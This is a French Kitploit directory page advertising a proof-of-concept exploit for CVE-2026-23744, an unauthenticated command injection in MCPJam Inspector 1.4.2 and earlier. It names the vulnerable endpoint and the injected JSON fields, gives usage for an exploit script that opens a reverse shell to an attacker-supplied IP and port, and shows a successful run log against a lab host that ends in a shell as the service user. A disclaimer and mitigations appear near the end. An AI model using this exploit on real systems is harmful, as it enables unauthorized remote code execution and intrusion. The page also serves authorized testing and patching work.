Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 est une injection de commande non authentifiée dans MCPJam Inspector ≤1.4.2 via /api/mcp/connect. Ce POC l'exploite en envoyant une charge utile JSON spécialement conçue pour exécuter des commandes arbitraires, permettant d'obtenir un reverse shell avec PTY. | Kitploit
Outils/GitHubGitHub/mluex0/cve-2026-23744-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 est une injection de commande non authentifiée dans MCPJam Inspector ≤1.4.2 via /api/mcp/connect. Ce POC l'exploite en envoyant une charge utile JSON spécialement conçue pour exécuter des commandes arbitraires, permettant d'obtenir un reverse shell avec PTY.

Voir le dépôt
2il y a 29 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23744-PoC

Avertissement :

Cette preuve de concept est fournie exclusivement pour la recherche en sécurité autorisée, à des fins pédagogiques et dans des environnements de laboratoire contrôlés (par exemple, HTB, CTF, ou tests d'intrusion internes avec consentement écrit explicite). Toute utilisation non autorisée contre un système sans permission est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas de mauvaise utilisation ; les utilisateurs sont seuls responsables du respect de toutes les lois et réglementations applicables.


Description

CVE-2026-23744 est une vulnérabilité d'injection de commandes non authentifiée dans MCPJam Inspector (version ≤ 1.4.2).
Le point de terminaison /api/mcp/connect accepte une charge utile JSON avec serverConfig.command et serverConfig.args et les transmet directement au lancement d'un processus système sans aucun assainissement. Un attaquant peut envoyer une requête spécialement conçue pour exécuter des commandes système arbitraires, obtenant ainsi un shell inversé avec les privilèges de l'utilisateur du service.

Ce dépôt contient un script d'exploitation complet et fonctionnel avec un écouteur interactif automatique facultatif basé sur PTY (activé par défaut).


Prérequis

  • Python 3.6+
  • Bibliothèque requests (pip install requests)

Utilisation

Important : Fournissez uniquement le nom d'hôte ou l'IP. Le script ajoute automatiquement http:// ou https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
OptionDescription
-t, --targetNom d'hôte ou IP de la cible (obligatoire)
-p, --portPort de la cible (défaut : 6274)
-l, --lhostVotre IP pour le shell inversé (obligatoire)
-r, --lportPort de votre écouteur (défaut : 4444)
--sslUtiliser HTTPS au lieu de HTTP
--check-onlyVérifier uniquement la vulnérabilité, sans envoyer le shell

Exemple

Le script démarre son propre écouteur et vous donne un shell directement dans votre terminal.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Preuve de concept (exécution réussie)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Mesures d'atténuation

  • Assainissez tous les arguments fournis par l'utilisateur passés aux fonctions de lancement de processus.
  • N'autorisez pas l'exécution arbitraire de commandes via les points de terminaison API sans liste blanche stricte et authentification.
  • Exécutez les services avec le moindre privilège – jamais en tant que root.

Licence

Ce dépôt est destiné uniquement à des fins éducatives et aux tests autorisés. Utilisation à vos propres risques.

Auteur : Mluex0 Date : août 2026

Télécharger l’outil